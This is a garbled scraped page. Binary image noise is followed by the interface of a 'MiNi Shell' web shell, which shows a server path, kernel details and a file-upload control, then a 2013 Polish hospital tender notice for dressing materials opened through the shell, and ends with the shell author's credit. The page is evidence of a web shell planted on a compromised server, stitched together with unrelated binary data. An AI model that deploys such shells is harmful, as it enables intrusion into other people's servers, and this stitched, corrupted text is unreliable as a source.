JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131114/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131114/240805-N-2013.html

<p class="kh_header"><b>Warszawa: DOSTAWA MATERIAŁÓW OPATRUNKOWYCH</b><br>
<b>Numer ogłoszenia: 240805 - 2013; data zamieszczenia: 14.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Kliniczny Szpital Okulistyczny , ul. Józefa Sierakowskiego 13, 03-709 Warszawa, woj. mazowieckie, tel. 022 6187979.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spkso.waw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA MATERIAŁÓW OPATRUNKOWYCH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa materiałów opatrunkowych do Działu Farmacji  
    Szpitalnej mieszczącego się w siedzibie Samodzielnego Publicznego Klinicznego Szpitala   
    Okulistycznego w Warszawie, ul. J. Sierakowskiego 13. Szczegółową specyfikację materiałów  
    opatrunkowych będących przedmiotem zamówienia określa załącznik nr 1 do SIWZ.

2. Zamawiający dopuszcza składanie ofert częściowych na poszczególne pakiety określone w     
    załączniku nr 1:
-pakiet 1 - materiały opatrunkowe I       (kompresy gaz.jał. )
-akiet 2 - materiały opatrunkowe II     (różne)
-pakiet 3 - materiały opatrunkowe III   (przylepce hipoalergiczne)
-pakiet 4 - materiały opatrunkowe IV    (jałowe opatrunki oczne)
-pakiet 5 - materiały opatrunkowe V      (gaza bawełniana)
-pakiet 6 - materiały opatrunkowe VI     (opatrunki do mocowania kaniul)
-pakiet 7 - materiały opatrunkowe VII   (mikrogąbki do osuszania pola operac.)
-pakiet 8 - materiały opatrunkowe VIII  (wchłanialna gąbka żelatynowa)
-pakiet 9 - materiały opatrunkowe IX     (paski do zamykania ran - wzmocnione i elastyczne)
-pakiet 10 - materiały opatrunkowe X     (przylepce włókninowe hipoalergiczne)
-pakiet 11 - materiały opatrunkowe XI   (kompresy z waty celulozowej + dozowniki)
-pakiet 12 - materiały opatrunkowe XII  (rękaw opatrunkowy na dłoń i przedramię)
-pakiet 13 - materiały do operacji odwarstwienia siatkówki  (gąbki i plomby silikonowe)
    Rozpatrywane będą tylko oferty kompletne w odniesieniu do poszczególnych pakietów..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 13.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki,      
                dotyczące posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli   
        przepisy prawa nakładają obowiązek ich posiadania,
   

2. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach   
    zdolnych do wykonania zamówienia  lub zdolnościach finansowych innych podmiotów,  
    niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej  
    sytuacji zobowiązany  jest udowodnić Zamawiającemu, iż będzie dysponował zasobami  
    niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne  
    zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres  
    korzystania z nich przy wykonywaniu zamówienia.

3. Zamawiający uzna, że wykonawca spełnia warunki udziału w postępowaniu, gdy wykonawca   
    złoży prawidłowo wszystkie dokumenty i oświadczenia wymienione w rozdziale III SIWZ, a  
    ponadto informacje zawarte w tych dokumentach będą zgodne z wymaganiami określonymi w  
    SIWZ.

 4. Analiza złożonych wraz z ofertą dokumentów i oświadczeń będzie stanowiła podstawę do   
     oceny  spełniania warunków udziału w postępowaniu oraz do stwierdzenia braku podstaw  
     do  wykluczenia wg zasady spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki,      
                dotyczące
   
    posiadania wiedzy i doświadczenia,
    
  

2. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach   
    zdolnych do wykonania zamówienia  lub zdolnościach finansowych innych podmiotów,  
    niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej  
    sytuacji zobowiązany  jest udowodnić Zamawiającemu, iż będzie dysponował zasobami  
    niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne  
    zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres  
    korzystania z nich przy wykonywaniu zamówienia.

3. Zamawiający uzna, że wykonawca spełnia warunki udziału w postępowaniu, gdy wykonawca   
    złoży prawidłowo wszystkie dokumenty i oświadczenia wymienione w rozdziale III SIWZ, a  
    ponadto informacje zawarte w tych dokumentach będą zgodne z wymaganiami określonymi w  
    SIWZ.

 4. Analiza złożonych wraz z ofertą dokumentów i oświadczeń będzie stanowiła podstawę do   
     oceny  spełniania warunków udziału w postępowaniu oraz do stwierdzenia braku podstaw  
     do  wykluczenia wg zasady spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki,      
                dotyczące
           dysponowania odpowiednim potencjałem technicznym 
 

2. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach   
    zdolnych do wykonania zamówienia  lub zdolnościach finansowych innych podmiotów,  
    niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej  
    sytuacji zobowiązany  jest udowodnić Zamawiającemu, iż będzie dysponował zasobami  
    niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne  
    zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres  
    korzystania z nich przy wykonywaniu zamówienia.

3. Zamawiający uzna, że wykonawca spełnia warunki udziału w postępowaniu, gdy wykonawca   
    złoży prawidłowo wszystkie dokumenty i oświadczenia wymienione w rozdziale III SIWZ, a  
    ponadto informacje zawarte w tych dokumentach będą zgodne z wymaganiami określonymi w  
    SIWZ.

 4. Analiza złożonych wraz z ofertą dokumentów i oświadczeń będzie stanowiła podstawę do   
     oceny  spełniania warunków udziału w postępowaniu oraz do stwierdzenia braku podstaw  
     do  wykluczenia wg zasady spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki,      
                dotyczące
    
    dysponowania  osobami zdolnymi do  wykonania zamówienia,


2. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach   
    zdolnych do wykonania zamówienia  lub zdolnościach finansowych innych podmiotów,  
    niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej  
    sytuacji zobowiązany  jest udowodnić Zamawiającemu, iż będzie dysponował zasobami  
    niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne  
    zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres  
    korzystania z nich przy wykonywaniu zamówienia.

3. Zamawiający uzna, że wykonawca spełnia warunki udziału w postępowaniu, gdy wykonawca   
    złoży prawidłowo wszystkie dokumenty i oświadczenia wymienione w rozdziale III SIWZ, a  
    ponadto informacje zawarte w tych dokumentach będą zgodne z wymaganiami określonymi w  
    SIWZ.

 4. Analiza złożonych wraz z ofertą dokumentów i oświadczeń będzie stanowiła podstawę do   
     oceny  spełniania warunków udziału w postępowaniu oraz do stwierdzenia braku podstaw  
     do  wykluczenia wg zasady spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki,      
                dotyczące   sytuacji ekonomicznej i finansowej.

2. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach   
    zdolnych do wykonania zamówienia  lub zdolnościach finansowych innych podmiotów,  
    niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej  
    sytuacji zobowiązany  jest udowodnić Zamawiającemu, iż będzie dysponował zasobami  
    niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne  
    zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres  
    korzystania z nich przy wykonywaniu zamówienia.

3. Zamawiający uzna, że wykonawca spełnia warunki udziału w postępowaniu, gdy wykonawca   
    złoży prawidłowo wszystkie dokumenty i oświadczenia wymienione w rozdziale III SIWZ, a  
    ponadto informacje zawarte w tych dokumentach będą zgodne z wymaganiami określonymi w  
    SIWZ.

 4. Analiza złożonych wraz z ofertą dokumentów i oświadczeń będzie stanowiła podstawę do   
     oceny  spełniania warunków udziału w postępowaniu oraz do stwierdzenia braku podstaw  
     do  wykluczenia wg zasady spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Dokumenty dopuszczające oferowane wyroby medyczne do obrotu i używania - zgodnie z     
    wymogami  ustawy z dnia 20 maja 2010 r. o wyrobach medycznych, tj.
    - Certyfikat lub deklarację zgodności z wymaganiami zasadniczymi dla wyrobu medycznego  
       oznakowanego znakiem CE.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wymagania jakie musi spełniać oferta składana przez dwa lub więcej podmiotów ubiegających  
     się wspólnie o udzielenie zamówienia (np. konsorcja, spółki cywilne):
1) w odniesieniu do wymagań postawionych przez Zamawiającego, każdy z Wykonawców  
występujących wspólnie, oddzielnie musi udokumentować, że nie podlega wykluczeniu na  
podstawie art. 24 ust. 1 ustawy PZP;
2) wiedzę i doświadczenie wymagane od Wykonawców w sumie muszą udokumentować  
podmioty ubiegające się wspólnie o udzielenie zamówienia; 
3) oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich  
Wykonawców występujących wspólnie;
4) Wykonawcy występujący wspólnie muszą ustanowić pełnomocnika do reprezentowania ich  
w postępowaniu o udzielenie niniejszego zamówienia lub do reprezentowania ich  
w postępowaniu oraz zawarcia umowy o udzielenie przedmiotowego zamówienia publicznego;
5) wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z podmiotem  
występującym jako reprezentant pozostałych.
   2. W zakresie nie uregulowanym SIWZ, zastosowanie mają przepisy Rozporządzenia Prezesa  
    Rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać  
    Zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. z  
    dnia 19 lutego 2013 r. poz.231).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 50.00</li>
<li>2 - Jakość - 50.00</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zakazuje się istotnych zmian postanowień zawartej Umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, z zastrzeżeniem ust. 2.
2.	Zmiany w Umowie mogą być dokonane jeżeli z powodu nadzwyczajnej zmiany stosunków spełnienie świadczenia byłoby  połączone z nadmiernymi trudnościami albo groziłoby jednej ze stron rażącą stratą, a w szczególności :
1)	w razie zmiany stanu prawnego którejkolwiek ze Stron, niezależnego od jej woli;
2)	w zakresie dotyczącym terminu dostawy wyłącznie w następujących przypadkach :
a)	wystąpienia siły wyższej, w tym zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć z pewnością, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach albo działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są konsekwencją winy którejkolwiek ze Stron,




b)	wystąpienia okoliczności leżących wyłącznie po stronie Zamawiającego, 
w szczególności wstrzymania dostawy,
c)	ograniczenia dostępności surowców służących do wykonania przedmiotu umowy,
d)	czasowego wstrzymania produkcji towarów lub braków towarów będących przedmiotem Umowy, w tym będące następstwem działania organów administracji publicznej,
mogą powodować odpowiednie przedłużenie terminu dostawy o czas niezbędny do należytego jej wykonania, nie dłużej jednak niż o okres tych okoliczności; 
3)	w zakresie  sposobu spełnienia świadczenia wyłącznie w następujących przypadkach:
a)	wystąpienia okoliczności spowodowanych nieprzewidywalną koniecznością dostawy towarów nie wymienionych w Umowie; Zamawiający w tym przypadku dopuszcza zakup towarów zamiennych, równoważnych (np. towarów w zamiennym opakowaniu lub towarów o tożsamej nazwie międzynarodowej innego producenta o innej nazwie handlowej), ale ich cena nie może przewyższać ceny towarów podstawowych. Wykonawca zobowiązany jest dostarczyć go na zasadach określonych w niniejszej Umowie,
b)	nie wykupienia pełnej ilości Przedmiotu dostawy; w tym przypadku Umowa może zostać przedłużona na czas niezbędny do  realizacji przedmiotu Umowy, z uwzględnieniem faktu, iż okres przedłużenia Umowy nie może być dłuższy niż 12 miesięcy;
4)	w odniesieniu do zakresu  przedmiotu świadczenia wyłącznie w następujących przypadkach:
a)	zmiany wielkości opakowania zbiorczego zaoferowanego produktu przy zachowaniu lub obniżeniu ceny jednostkowej określonej w Załączniku nr 1 do Umowy,
b)	zmiany numeru katalogowego lub nazewnictwa produktu, przy zachowaniu lub obniżeniu ceny jednostkowej określonej w Załączniku nr 1 do Umowy,
c)	zmiany ilości jednostek miary określonych dla poszczególnych produktów w Załączniku nr 1 do Umowy, z zastrzeżeniem, że nie może to powodować przekroczenia kwoty, o której mowa w § 4 ust. 1;
d)	zakontraktowania przez Narodowy Fundusz Zdrowia u Zamawiającego mniejszej w stosunku do oferowanej liczby świadczeń zdrowotnych lub po cenach niższych od ponoszonych przez Zamawiającego kosztów tych świadczeń, mających zasadniczy  wpływ na sytuację majątkową strony; 
                    e)    niewielkiej zmiany zakresu poszczególnych zestawów o ile   zmiany te będą  
                           korzystne dla Zamawiającego i nie spowodują zwiększenia wartości umowy.
5)	w odniesieniu do wysokości wynagrodzenia wyłącznie w  przypadkach:
a)	 określonym w pkt 4 d powyżej;
b)	udzielania przez Wykonawcę upustów promocyjnych; w tym  przypadku upusty będą obowiązywały również dla niniejszej Umowy.
c)	urzędowej zmiany stawek VAT. W takim przypadku zmiana ceny nastąpi z dniem wejścia w życie aktu prawnego zmieniającego stawkę podatku VAT z zachowaniem ceny netto, która pozostaje bez zmian.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.spkso.waw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Kliniczny Szpital Okulistyczny w Warszawie, ul. Józefa Sierakowskiego 13.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.11.2013 godzina 10:00, miejsce: Samodzielny Publiczny Kliniczny Szpital Okulistyczny w Warszawie, ul. Józefa Sierakowskiego 13 - Kancelaria.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com